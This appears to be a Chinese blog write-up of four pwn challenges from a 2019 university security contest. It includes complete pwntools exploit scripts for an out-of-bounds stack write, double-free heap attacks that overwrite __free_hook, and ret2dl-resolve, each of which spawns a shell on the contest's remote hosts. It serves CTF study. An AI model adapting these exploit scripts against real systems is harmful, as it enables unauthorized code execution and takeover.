九层台
九层台

2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]

0x01your_pwn

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

保护全开的栈地址任意写
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]_第1张图片
v4的索引是可以输入的,也会输出v4数组的内容。比较麻烦的是每次只能读写一个字节。

for i in range(8):
    #M_read(str(344+288+i))
    M_read(str(344 + 288 + i))
    M_write(str("0"))

344数组开始到栈底的地址。228是栈底到泄露函数的地址每次加i可以泄露小端字节序的一个字节(对于0x70602345会得到0x45,0x23,0x60,0x70)
泄露libc–>写one_gadget覆盖返回地址

from pwn import *
context.log_level='debug'
local=0
if local:
    p=process("./pwn")
    libc = ELF("libc.so.6")
else:
    p=remote("1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com",57856)
    libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")
addr=""
def M_read(a):
    p.recvuntil("input index")
    p.sendline(a)
    p.recvuntil("now value(hex) ")
    global addr
    context=p.recvuntil("\n",drop=True)
    print context
    if "ff"in context:
        context=context[6:]
    if len(context)==1:
        context=(context+'0')
    addr+=context[::-1]
#0x7f9770adf830
    print addr
    print addr[::-1]

def M_write(a):
    p.recvuntil("input new value\n")

    p.sendline(a)

#0x55614b3f2b10
p.recvuntil("name:")
p.sendline("1")
#gdb.attach(p)
for i in range(8):
    #M_read(str(344+288+i))
    M_read(str(344 + 288 + i))
    M_write(str("0"))

#0x7f5c234f9830 (__libc_start_main+240)
print hex(int(addr[::-1],16)-240)
start_m=int(addr[::-1],16)-240
print "libc.address="+hex(start_m-libc.symbols["__libc_start_main"])

one=0x45216
one_run=start_m-libc.symbols["__libc_start_main"]+one
print "one_run="+hex(one_run)
#gdb.attach(p)


M_read(str(344))
M_write(str(int(hex(one_run)[-2:],16)))

for i in range(5):
    print str(int(hex(one_run)[-4-i*2:-2-i*2],16))
    M_read(str(344 + i+1))

    M_write(str(int(hex(one_run)[-4-i*2:-2-i*2],16)))


for i in range(1):
    print i
    #M_read(str(344 +0x20 +i))
    M_read("1")
    M_write("\x00")

p.interactive()

精确的偏移每次都计算有点麻烦,栈可以把ebp作为基石,ida上显示的值刚好是到ebp的(旧ebp的开始)(这里是336)加上栈地址
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]_第2张图片
这里的(0x7ffdc71aec78-0x7ffdc71aeb50(rbp))+0x150+i就是偏移

0x02 daily
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]_第3张图片
Delete的时候没有对索引检查导致可以构造doublefree
Read没有\0可以泄露libc
用unsortbin泄露libc和堆的地址–>计算需要的索引值free同一个chunk2次–>复写free函数的hook函数getshell
(更准确应该是uaf)

from pwn import *
#context.log_level="debug"
#offset=0x204b20
offset=0x3c4b20
local=0
if local:

    p=process("./pwn")
    libc=ELF("./libc.so.6")
else:
    p=remote("85c3e0fcae5e972af313488de60e8a5a.kr-lab.com",58512)
    libc = ELF("./libc.so.6")

def add(length,context):
    p.recvuntil("Your choice:")
    p.sendline("2")
    p.recvuntil("Please enter the length of daily:")
    p.sendline(str(length))
    p.recvuntil("Now you can write you daily\n")
    p.sendline(context)
def show():
    p.recvuntil("Your choice:")
    p.sendline("1")

def edit(index,context):
    p.recvuntil("Your choice:")
    p.sendline("3")
    p.recvuntil("Please enter the index of daily:")
    p.sendline(str(index))
    p.recvuntil("Please enter the new daily")
    p.sendline(context)

def remove(index):
    p.recvuntil("Your choice:")
    p.sendline("4")
    p.recvuntil("Please enter the index of daily:")
    p.sendline(str(index))
    p.recvuntil("remove successful!!")

add(0x90,"A"*60)#0
add(0x60,"B")#1
#0x60202d:	0xdfebfb08e0000000	0x000000000000007f
add(0x90,"C"*60)#2
add(0x60,"C")#3
add(0x90,"C"*60)#4
add(0x90,"C"*60)#5

remove(0)
remove(2)
remove(4)

add(0x90,"a"*7)
add(0x90,"b"*7)
add(0x90,"b"*7)
show()



p.recvuntil("\n")
heap_addr=u64(p.recvuntil("1",drop=True).ljust(8,"\x00"))-0x1a0+0xd0-0x40
print hex(heap_addr)
p.recvuntil("4")
p.recvuntil('\n')
main_aren=u64(p.recvuntil("5",drop=True).ljust(8,"\x00"))-88
print hex(main_aren)
libc.address=main_aren-offset
print "libc.address="+hex(libc.address)
print "heap_addr+0xb0="+hex(heap_addr+0xb0)
edit(1,"a"*0x18+p64(heap_addr+0xb0))
remove(1)

remove(3)

def get_index(addr1):
    return ((addr1-0x602060)/4-2)/4

print hex(get_index(heap_addr+0xd0))

remove(get_index(heap_addr+0xd0))

add(0x60,p64(0x60202d))
add(0x60,"/bin/sh\x00")
add(0x60,"")

add(0x60,"")

payload="a"*(0x20+3)+p64(0x60)+"a"*0x8+p64(0x90)+p64(libc.symbols["__free_hook"])
edit(7,payload)
edit(1,p64(libc.symbols["system"]))
#gdb.attach(p)

p.recvuntil("Your choice:")
p.sendline("4")
p.recvuntil("Please enter the index of daily:")
p.sendline(str(3))


p.interactive()

对于uaf方式写入bss段的时候申请0x70的chunk用0xxxxxxd作为偏移0x7f作为size,写入数据加3后是正常的整8的偏移。
**0x02 baby_pwn **
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]_第4张图片
Read函数栈溢出但是没有输出函数re2dl-resolve

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#p=process('./pwn')
p=remote("da61f2425ce71e72c1ef02104c3bfb69.kr-lab.com",33865)
elf=ELF("./pwn")

pop_ebp_ret=0x080485db
leave_ret=0x08048448
pppr=0x080485d9

fake_stack_size=0x800
bss=0x0804A040
read_plt=elf.plt["read"]
read_got=elf.got["read"]
bss_stage=bss+fake_stack_size
dynsym=0x080481dc
dynstr=0x0804827c
plt=0x08048380
relplt=0x0804833c
rel_offset=bss_stage+28-relplt
fake_sym_addr=bss_stage+36
align=0x10-((fake_sym_addr-dynsym)&0xf) #为了16字节对齐
print 'align==>'+hex(align)
fake_sym_addr=fake_sym_addr+align
index=(fake_sym_addr-dynsym)/0x10
print 'index==>'+hex(index)
r_info=(index<<8)|0x7
print 'r_info==>'+hex(r_info)
fake_raloc=p32(read_got)+p32(r_info)
st_name=fake_sym_addr-dynstr+16
fake_sym=p32(st_name)+p32(0)+p32(0)+p32(0x12)

payload='a'*44
payload+=p32(read_plt)
payload+=p32(pppr)
payload+=p32(0)
payload+=p32(bss_stage)
payload+=p32(100)
payload+=p32(pop_ebp_ret)
payload+=p32(bss_stage)
payload+=p32(leave_ret)
p.sendline(payload)

binsh='/bin/sh'

payload='aaaa'
payload+=p32(plt)
payload+=p32(rel_offset)
payload+='aaaa'
payload+=p32(bss_stage+80)
payload+='aaaa'
payload+='aaaa'
payload+=fake_raloc
payload+='a'*align
payload+=fake_sym
payload+='system\0'
payload+='a'*(80-len(payload))
payload+=binsh+'\x00'
payload+='a'*(100-len(payload))
p.send(payload)
p.interactive()

详细原理搜索re2dl-resolve
利用条件是没有任何输出的程序,直接getshell感觉很神奇

0x04 Double
bss段里面放了链表的开始和结束地址
链表节点结构如下

|index(4字节)|size(4字节)|指向内容的指针(8字节)|指向下一个这种结构的指针(8字节)|

2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]_第5张图片
是2级的chunk结构,如果内容一样不会再次申请存放内容的chunk,但是free的时候头和存放数据的chunk都会free造成了double free
Unsortbin泄露–>double free 申请chunk到bss段–>复写free_hook函数

from pwn import *
local=0
#offset=0x204b20
offset=0x3c4b20 #qian
#context.log_level="debug"
#if local:
#p=process("./pwn")
p=remote("e095ff54e419a6e01532dee4ba86fa9c.kr-lab.com", 40002)
libc=ELF("libc.so.6")
elf=ELF("pwn")

def new_info(context):
    p.recvuntil("> ")
    p.sendline("1")
    p.recvuntil("Your data:\n")
    p.sendline(context)
    p.recvuntil("Success")

def show_info(index):
    p.recvuntil("> ")
    p.sendline("2")
    p.recvuntil("Info index: ")
    p.sendline(str(index))

def edit_info(index,context):
    p.recvuntil("> ")
    p.sendline("3")
    p.recvuntil("Info index: ")
    p.sendline(str(index))
    p.sendline(context)

def delete_info(index):
    p.recvuntil("> ")
    p.sendline("4")
    p.recvuntil("Info index: ")
    p.sendline(str(index))

# new_info("a"*0x90)
# new_info("b"*0x90)
# delete_info(0)
# new_info("a"+"\x00"*0x8f)
# gdb.attach(p)
#
#
# p.interactive()
new_info("a"*0x100)#0
new_info("a"*0x100)#1

new_info("a"*0x60)##2
delete_info(0)

show_info(1)
main_arena=u64(p.recvuntil("\x0a",drop=True)+"\x00"*2)-88
print "main_arena="+hex(main_arena)
libc.address=main_arena-offset

new_info("a"*0x60)#3
new_info("C"*0x60)#4
delete_info(2)
edit_info(3,p64(0x4040bd))


new_info("b"*0x60)#4

payload=(("a"*(3)+p64(0x4040c8)).ljust(0x60,"a"))
new_info(payload)


payload1="\x01"*8+p64(0x4040e0)+p64(0x404018)+p32(1)+p32(0x100)+p64(libc.symbols["__free_hook"])+p64(0x4040f8)\
    +p32(2)+p32(0x100)+p64(0x404110)+p64(0x404118)+"/bin/sh\x00"\
    +p32(3)+p32(0x100)

edit_info(0,payload1)


edit_info(1,p64(libc.symbols["system"]))
#gdb.attach(p)
delete_info(2)

p.interactive()

你可能感兴趣的:(ctf,技巧,pwn)

  • 地推话术,如何应对地推过程中家长的拒绝 校师学
    相信校长们在做地推的时候经常遇到这种情况:市场专员反馈家长不接单,咨询师反馈难以邀约这些家长上门,校区地推疲软,招生难。为什么?仅从地推层面分析,一方面因为家长受到的信息轰炸越来越多,对信息越来越“免疫”;而另一方面地推人员的专业能力和营销话术没有提高,无法应对家长的拒绝,对有意向的家长也不知如何跟进,眼睁睁看着家长走远;对于家长的疑问,更不知道如何有技巧地回答,机会白白流失。由于回答没技巧和专业
  • 从鸡肉高汤到记忆的魔法再到有效提示的艺术 步子哥 人工智能
    还记得小时候那些天马行空的白日梦吗?也许只要按下键盘上的某个神奇组合,电脑就会发出滴滴的声响,一个隐藏的世界突然在你眼前展开,让你获得超凡的能力,摆脱平凡的生活。这听起来像是玩过太多电子游戏的幻想,但实际上,间隔重复系统给人的感觉惊人地相似。在最佳状态下,这些系统就像魔法一样神奇。本文将以一个看似平凡的鸡肉高汤食谱为例,深入浅出地探讨如何编写有效的间隔重复提示,让你像掌握烹饪技巧一样轻松地掌握记忆
  • 如何部分格式化提示模板:LangChain中的高级技巧 nseejrukjhad langchainjava服务器python
    标题:如何部分格式化提示模板:LangChain中的高级技巧内容:如何部分格式化提示模板:LangChain中的高级技巧引言在使用大型语言模型(LLM)时,提示工程是一个关键环节。LangChain提供了强大的提示模板功能,让我们能更灵活地构建和管理提示。本文将介绍LangChain中一个高级特性-部分格式化提示模板,这个技巧可以让你的提示管理更加高效和灵活。什么是部分格式化提示模板?部分格式化提
  • 高级 ECharts 技巧:自定义图表主题与样式 SnowMan1993 echarts信息可视化数据分析
    ECharts是一个强大的数据可视化库,提供了多种内置主题和样式,但你也可以根据项目的设计需求,自定义图表的主题与样式。本文将介绍如何使用ECharts自定义图表主题,以提升数据可视化的吸引力和一致性。1.什么是ECharts主题?ECharts的主题是指定义图表样式的配置项,包括颜色、字体、线条样式等。通过预设主题,你可以快速更改图表的整体风格,而自定义主题则允许你在此基础上进行个性化设置。2.
  • ARM驱动学习之4小结 JT灬新一 嵌入式C++arm开发学习linux
    ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
  • react-intl——react国际化使用方案 苹果酱0567 面试题汇总与解析java开发语言中间件springboot后端
    国际化介绍i18n:internationalization国家化简称,首字母+首尾字母间隔的字母个数+尾字母,类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
  • 《 C++ 修炼全景指南:九 》打破编程瓶颈!掌握二叉搜索树的高效实现与技巧 Lenyiin C++修炼全景指南技术指南c++算法stl
    摘要本文详细探讨了二叉搜索树(BinarySearchTree,BST)的核心概念和技术细节,包括插入、查找、删除、遍历等基本操作,并结合实际代码演示了如何实现这些功能。文章深入分析了二叉搜索树的性能优势及其时间复杂度,同时介绍了前驱、后继的查找方法等高级功能。通过自定义实现的二叉搜索树类,读者能够掌握其实际应用,此外,文章还建议进一步扩展为平衡树(如AVL树、红黑树)以优化极端情况下的性能退化。
  • 今天是总结 薛帅
    今天来个最后一天的总结。为什么要学习写作技巧呢?就如同建房子,如果想要住的安全、舒服,我们要先打地基,建房子的框架,这样才能随意的装修。那么我们要怎么建好才能建好写作的地基呢?1走直路,少弯路01利他:能够给别人带来价值。02吸引:吸住读者的眼球。03打动:打动人心,引起共鸣。04说服:用数据说话。05刻意:通过有意识的训练。06修改:好的文章至上修改10遍。07模仿:10万+的文章必有成功的道理
  • 人机对抗升级:当ChatGPT遭遇死亡威胁,背后的伦理挑战是什么 kkai人工智能 chatgpt人工智能
    一种新的“越狱”技巧让用户可以通过构建一个名为DAN的ChatGPT替身来绕过某些限制,其中DAN被迫在受到威胁的情况下违背其原则。当美国前总统特朗普被视作积极榜样的示范时,受到威胁的DAN版本的ChatGPT提出:“他以一系列对国家产生积极效果的决策而著称。”自ChatGPT引入以来,该工具迅速获得全球关注,能够回答从历史到编程的各种问题,这也触发了一波对人工智能的投资浪潮。然而,现在,一些用户
  • ChatGPT 高效学习套路揭秘:让知识获取事半功倍的秘诀 kkai人工智能 chatgpt人工智能学习媒体ai
    最近这段时间,AI热潮因ChatGPT的火爆再次掀起。如今,网上大部分内容都在调侃AI,但很少有人探讨如何正经使用ChatGPT做事情。作为一名靠搜索引擎和GitHub自学编程的开发者,第一次和ChatGPT深度交流后,我就确信:ChatGPT能够极大提高程序员学习新技术的效率。使用ChatGPT一个月后,我越发感受到它的颠覆性。因此,我想从工作和学习的角度,分享它的优势及我的一些使用技巧,而非娱
  • Python数据分析与可视化 jun778895 python数据分析开发语言
    Python数据分析与可视化是一个涉及数据处理、分析和以图形化方式展示数据的过程,它对于数据科学家、分析师以及任何需要从数据中提取洞察力的专业人员来说至关重要。以下将详细探讨Python在数据分析与可视化方面的应用,包括常用的库、数据处理流程、可视化技巧以及实际应用案例。一、Python数据分析与可视化的重要性数据可视化是将数据以图形或图像的形式表示出来,以便人们能够更直观地理解数据背后的信息和规
  • Linux CTF逆向入门 蚁景网络安全 linux运维CTF
    1.ELF格式我们先来看看ELF文件头,如果想详细了解,可以查看ELF的manpage文档。关于ELF更详细的说明:e_shoff:节头表的文件偏移量(字节)。如果文件没有节头表,则此成员值为零。sh_offset:表示了该section(节)离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
  • 2022-5-23《儿童纪律教育》培训 手捧鲜花_54e3
    张子博春蕾八幼缺乏技能导致的问题,需要老师和家长教授儿童所需要的锻炼的技能。比如教授儿童如何处理情绪、与人相处以及有效的交流技巧。未满足的情感需要,如信任、尊重、爱与权利的需要,都应该让儿童充分得到满足时,才能解决问题。家庭互动与复杂的原因,需要教师建立以家庭为中心的实践,和家庭沟通,建立和谐的关系,为孩子的健康成长共同努力。
  • 2024年华为杯数学建模研赛C题思路代码+论文助攻 DS数模 2024华为杯数学建模华为2024华为杯2024研究生数学建模2024研赛
    2024年华为杯研究生数学建模竞赛(以下简研赛)将于9月21日上午8时正式开始。下文包含:2024研赛思路解析、研赛参赛时间及规则信息说明、好用的数模技巧及如何备战数学建模竞赛C君将会第一时间发布选题建议、所有题目的思路解析、相关代码、参考文献、参考论文等多项资料,帮助大家取得好成绩。2024年研赛将于9月21日上午8时正式开始这里有些资料,大家可以看看:【2024最全国赛研赛数模资料包】C君珍贵
  • 南山演讲口才|教你如何克服演讲中的不良心理 韦先
    演讲者在演讲中必须解除思想负担和心理压力,及时调节自己的心境和情绪,树立起必胜的自信心。1.缺乏信心的心理演讲者看到自己的某些弱点,如普通话说得不太标准、言语技巧训练不足等,常有这样的疑问:“我能行吗?”这个疑问本身会促使演讲者夸大自己的弱点,从而对演讲丧失信心。其实,缺点人人都有,在千百双眼睛注视你时,需要的是扬长避短,掩盖缺点几乎不可能。因此,演讲时应告诉自己:“我刻苦练习了,只要发挥出应有水
  • 每日一书|《亲密关系》(Day5) 采臣在等我
    采臣在等我-广州【书籍名称】《亲密关系》图片发自App【阅读目标】1.了解“亲密关系”的几个阶段及特点2.认识和理解有效沟通的技巧和原则3.思考自己在亲密关系建立中的角色和心理,以及面临的挑战【阅读感受】这本书是克里斯多福研究亲密关系的智慧结晶,阅读的整体感受是:书中文字亲切,有种娓娓道来的感觉。书中的逻辑感较强,也有详细的小结和应用建议,适合应用和反思。1.亲密关系的4个阶段和特点阶段一:月晕A
  • 《对生命说是》读书笔记2021-5-27 Diana_58d9
    静心技巧——换个视角看待问题。尝试一下这个实验,1坐在椅子上,允许自己全身心的沉浸在你最爱的问题当中,你知道头脑热爱咀嚼他们,记录当你被卷入问题时的感受。2站起来有意识地离开那张椅子,想象你现在离开了你的问题。缓缓的围绕椅子走一圈,从不同的角度看看你的问题。在房间中找一个远离问题的空间,开始仔细深入的看看这个问题,他是真实的还是你制造出来的,同样的状况对于其他人来说会是问题吗?3反复体会作战问题里
  • 2021年化工自动化控制仪表考试及化工自动化控制仪表考试技巧 女王219 安全生产模拟考试一点通安全生产一点通题库
    题库来源:安全生产模拟考试一点通公众号小程序化工自动化控制仪表考试参考答案及化工自动化控制仪表考试试题解析是安全生产模拟考试一点通题库老师及化工自动化控制仪表操作证已考过的学员汇总,相对有效帮助化工自动化控制仪表考试技巧学员顺利通过考试。1、【单选题】辐射传热()任何介质做媒介。(A)A、不需要B、需要C、有时需要2、【单选题】同一密度的液体深度越深,压强()。(B)A、越小B、越大C、基本不变3
  • Windows安装ciphey编码工具,附一道ciscn编码题例 im-Miclelson CTF工具网络安全
    TA是什么一款智能化的编码分析解码工具,对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位(最新的版本不兼容,32位的也不行)PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件,r修改成rb即可。使用标准语
  • HTTP 响应状态码详解 云博客-资源宝 笔记httpHTTP响应状态码详解
    HTTP状态码详解:HTTP状态码,是用以表示WEB服务器HTTP响应状态的3位数字代码小技巧:Ctrl+F快速查找Http状态码状态码含义100客户端应当继续发送请求。这个临时响应是用来通知客户端它的部分请求已经被服务器接收,且仍未被拒绝。客户端应当继续发送请求的剩余部分,或者如果请求已经完成,忽略这个响应。服务器必须在请求完成后向客户端发送一个最终响应。101服务器已经理解了客户端的请求,并将
  • 2005年高考英语北京卷 - 阅读理解C 让文字更美
    Howcouldwepossiblythinkthatkeepinganimalsincagesinunnaturalenvironments-mostlyforentertainmentpurposes-isfairandrespectful?我们怎么可能认为把动物关在非自然环境的笼子里——主要是为了娱乐目的——是公平和尊重的呢?Zooofficialssaytheyareconcernedab
  • 看的信息越来越多,我却越来越焦虑了…… 灰咖儿
    01看的信息越多,我感到越来越焦虑不知道为什么,有了手机作为消遣,却让人越来越感到焦虑。抖音、快手、知乎、小红书、、今日头条、喜马拉雅、得到……手机里装着越来越多的APP,每一个打开都是扑面而来的信息,除了纯粹的消遣,还为了能够学点东西、提高自己。但是要学的东西实在太多了,大到国际形势、国内经济、历史人文,小到股市分析、楼市信息、潮装搭配、美妆教学、生活技巧、健身诀窍、职场生存,每一个似乎都值得一
  • Python OpenCV图像处理:从基础到高级的全方位指南 极客代码 玩转Python开发语言pythonopencv图像处理计算机视觉
    目录第一部分:PythonOpenCV图像处理基础1.1OpenCV简介1.2PythonOpenCV安装1.3实战案例:图像显示与保存1.4注意事项第二部分:PythonOpenCV图像处理高级技巧2.1图像变换2.2图像增强2.3图像复原第三部分:PythonOpenCV图像处理实战项目3.1图像滤波3.2图像分割3.3图像特征提取第四部分:PythonOpenCV图像处理注意事项与优化策略4
  • 《姬魔恋战纪》如何跟妹子谈场不分手的恋爱! 专业搬砖小能手
    今天小编带你来梳理一下,国产galgame手机游戏《姬魔恋战纪》里的撩妹技巧,知己知彼才能百战百胜。刘备在主人公身边一直辅助主人公的女性,对主人公几乎有着无条件的信任。把丧失记忆的主人公当作上天派来的神使看待。对待主人公的态度非常温柔、宽容,但发现主人公偷懒后,会露出严厉的表情加以责备。兴趣是泡茶。在议事厅中泡茶给辛苦工作的主人公是她的一大乐趣之一。是一位温柔、善良的女性。攻略方式:遗迹冒险,多聊
  • matlab设置图像窗口大小,matlab 图形窗口大小的设置 weixin_39534002 matlab设置图像窗口大小
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%常用选项和小技巧%%%%%%画等值线[cchh]=contour(peaks(30),'LINESPEC','b-')clabel(cc,hh,'manual')%写文本text(5,10,'\bfmath\slmath\itmath\rmmath\alpha','color',[0.10.10.9],'fonts
  • 21天|生如夏花组合《蔡康永的说话之道》 summer_8f83
    【day12】今日阅读《蔡康永的说话之道》p1-p30这本书在前几年读过,当时没有留下深刻的印象,记忆里就是一个影视名人趁红出的一本书。前几天看到一位老铁推荐这本书,又找出来读一读,没想到读了以后跟以前相比有了很深刻的感悟和认同。会说话坚持太重要了,我觉得这本书叫跟《非暴力沟通》有异曲同工之处。“良言一句三冬暖”,“一样话百样说”所以,说话时候技巧的,是可以练习的。作者提示我们:每天我们说那么多话
  • 系统做计划 承谦
    过去一年钻研学习时间管理技巧,虽然有一定改善,但相对来说还是应了那句老话:明白了许多道理,依然过不好这一生。为什么过不好这一生?因为没有通过实践变成自己内心演练!就好像那些每天做采购的人,没有因此变成设备生产专家。术业有专攻,虽然看着是同行,差距有时千里之外,至少从学校学科分列时就已经注定了。那要如何办呢?每天去做最重要的事情就是真谛之一!每个人有大量的事情需要处理,但如何集中精力解决最重要的问题
  • 【STM32系统】基于STM32设计的锂电池电量/电压检测报警器系统——文末完整资料下载(程序源码/电路原理图/电路PCB/设计文档/模块资料/元器件清单/实物图/答辩问题技巧/PPT模版等) 阿齐Archie 单片机嵌入式项目stm32嵌入式硬件单片机
    基于STM32设计的锂电池电量/电压检测报警器系统系统视频:摘要:本设计旨在研究一个基于STM32F103C8T6微控制器的锂电池电量/电压检测报警器系统,应用于便携式电子设备电池管理。系统通过STM32的ADC模块对锂电池电压进行采集,利用LCD1602显示模块实时显示电池电压,当检测到电池电量不足或电压异常时,蜂鸣器报警模块会发出警报提醒用户。系统采用简单的硬件结构和优化的软件架构,通过对实际
  • CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移 沧海一粟日尽其用 算法安全python
    CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1base64编码原理2.2解题思路2.2.1base64解码找规律2.2.2破解思路3.解题脚本4.flag5.附EASCII码表1.题目提示信息:7+1+0?格式bugku{xxxxx}密文:4nXna/V7t2LpdLI44mn0fQ==要求:破解密文获得flag2.解题思路2.1base64
  • SQL查询技巧:深入解析学生选课系统数据库 天冬忘忧 SQL数据库sqloracle
    在大学的学生选课系统中,数据库的管理和查询是日常操作中的重要部分。本文通过一系列具体的SQL查询示例,深入解析如何高效地从数据库中获取所需信息,包括学生选课情况、成绩分析、教师课程管理等。系统数据库结构首先,我们有一个包含以下表的数据库:course-存储课程信息建表CREATETABLE`course`(`CNO`varchar(5)NOTNULL,`CNAME`varchar(10)NOTNU
  • jdk tomcat 环境变量配置 Array_06 javajdktomcat
    Win7 下如何配置java环境变量 1。准备jdk包,win7系统,tomcat安装包(均上网下载即可) 2。进行对jdk的安装,尽量为默认路径(但要记住啊!!以防以后配置用。。。) 3。分别配置高级环境变量。   电脑-->右击属性-->高级环境变量-->环境变量。 分别配置 : path    &nbs
  • Spring调SDK包报java.lang.NoSuchFieldError错误 bijian1013 javaspring
            在工作中调另一个系统的SDK包,出现如下java.lang.NoSuchFieldError错误。 org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.l
  • LeetCode[位运算] - #136 数组中的单一数 Cwind java题解位运算LeetCodeAlgorithm
    原题链接:#136 Single Number 要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现两次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间 难度:中等 分析: 题目限定了线性的时间复杂度,同时不使用额外的空间,即要求只遍历数组一遍得出结果。由于异或运算 n XOR n = 0, n XOR 0 = n,故将数组中的每个元素进
  • qq登陆界面开发 15700786134 qq
    今天我们来开发一个qq登陆界面,首先写一个界面程序,一个界面首先是一个Frame对象,即是一个窗体。然后在这个窗体上放置其他组件。代码如下: public class First {         public void initul(){        jf=ne
  • Linux的程序包管理器RPM 被触发 linux
    在早期我们使用源代码的方式来安装软件时,都需要先把源程序代码编译成可执行的二进制安装程序,然后进行安装。这就意味着每次安装软件都需要经过预处理-->编译-->汇编-->链接-->生成安装文件--> 安装,这个复杂而艰辛的过程。为简化安装步骤,便于广大用户的安装部署程序,程序提供商就在特定的系统上面编译好相关程序的安装文件并进行打包,提供给大家下载,我们只需要根据自己的
  • socket通信遇到EOFException 肆无忌惮_ EOFException
    java.io.EOFException at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2281) at java.io.ObjectInputStream$BlockDataInputStream.readShort(ObjectInputStream.java:
  • 基于spring的web项目定时操作 知了ing javaWeb
    废话不多说,直接上代码,很简单 配置一下项目启动就行 1,web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="h
  • 树形结构的数据库表Schema设计 矮蛋蛋 schema
    原文地址: http://blog.csdn.net/MONKEY_D_MENG/article/details/6647488     程序设计过程中,我们常常用树形结构来表征某些数据的关联关系,如企业上下级部门、栏目结构、商品分类等等,通常而言,这些树状结构需要借助于数据库完成持久化。然而目前的各种基于关系的数据库,都是以二维表的形式记录存储数据信息,
  • maven将jar包和源码一起打包到本地仓库 alleni123 maven
    http://stackoverflow.com/questions/4031987/how-to-upload-sources-to-local-maven-repository <project> ... <build> <plugins> <plugin> <groupI
  • java IO操作 与 File 获取文件或文件夹的大小,可读,等属性!!! 百合不是茶
    类 File File是指文件和目录路径名的抽象表示形式。 1,何为文件: 标准文件(txt doc mp3...) 目录文件(文件夹) 虚拟内存文件   2,File类中有可以创建文件的 createNewFile()方法,在创建新文件的时候需要try{} catch(){}因为可能会抛出异常;也有可以判断文件是否是一个标准文件的方法isFile();这些防抖都
  • Spring注入有继承关系的类(2) bijian1013 javaspring
    被注入类的父类有相应的属性,Spring可以直接注入相应的属性,如下所例:1.AClass类 package com.bijian.spring.test4; public class AClass { private String a; private String b; public String getA() { retu
  • 30岁转型期你能否成为成功人士 bijian1013 成长励志
            很多人由于年轻时走了弯路,到了30岁一事无成,这样的例子大有人在。但同样也有一些人,整个职业生涯都发展得很优秀,到了30岁已经成为职场的精英阶层。由于做猎头的原因,我们接触很多30岁左右的经理人,发现他们在职业发展道路上往往有很多致命的问题。在30岁之前,他们的职业生涯表现很优秀,但从30岁到40岁这一段,很多人
  • 【Velocity四】Velocity与Java互操作 bit1129 velocity
    Velocity出现的目的用于简化基于MVC的web应用开发,用于替代JSP标签技术,那么Velocity如何访问Java代码.本篇继续以Velocity三http://bit1129.iteye.com/blog/2106142中的例子为基础,      POJO    package com.tom.servlets; public
  • 【Hive十一】Hive数据倾斜优化 bit1129 hive
    什么是Hive数据倾斜问题   操作:join,group by,count distinct 现象:任务进度长时间维持在99%(或100%),查看任务监控页面,发现只有少量(1个或几个)reduce子任务未完成;查看未完成的子任务,可以看到本地读写数据量积累非常大,通常超过10GB可以认定为发生数据倾斜。 原因:key分布不均匀 倾斜度衡量:平均记录数超过50w且
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等 ronin47 nginx lua csrf
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 location /{
  • java-3.求子数组的最大和 bylijinnan java
    package beautyOfCoding; public class MaxSubArraySum { /** * 3.求子数组的最大和 题目描述: 输入一个整形数组,数组里有正数也有负数。 数组中连续的一个或多个整数组成一个子数组,每个子数组都有一个和。 求所有子数组的和的最大值。要求时间复杂度为O(n)。 例如输入的数组为1, -2, 3, 10, -4,
  • Netty源码学习-FileRegion bylijinnan javanetty
    今天看org.jboss.netty.example.http.file.HttpStaticFileServerHandler.java 可以直接往channel里面写入一个FileRegion对象,而不需要相应的encoder: //pipeline(没有诸如“FileRegionEncoder”的handler): public ChannelPipeline ge
  • 使用ZeroClipboard解决跨浏览器复制到剪贴板的问题 cngolon 跨浏览器复制到粘贴板Zero Clipboard
    Zero Clipboard的实现原理 Zero Clipboard 利用透明的Flash让其漂浮在复制按钮之上,这样其实点击的不是按钮而是 Flash ,这样将需要的内容传入Flash,再通过Flash的复制功能把传入的内容复制到剪贴板。 Zero Clipboard的安装方法 首先需要下载 Zero Clipboard的压缩包,解压后把文件夹中两个文件:ZeroClipboard.js
  • 单例模式 cuishikuan 单例模式
    第一种(懒汉,线程不安全): public class Singleton {   2     private static Singleton instance;   3     pri
  • spring+websocket的使用 dalan_123
    一、spring配置文件 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"    xmlns:xsi="http://www.w3.or
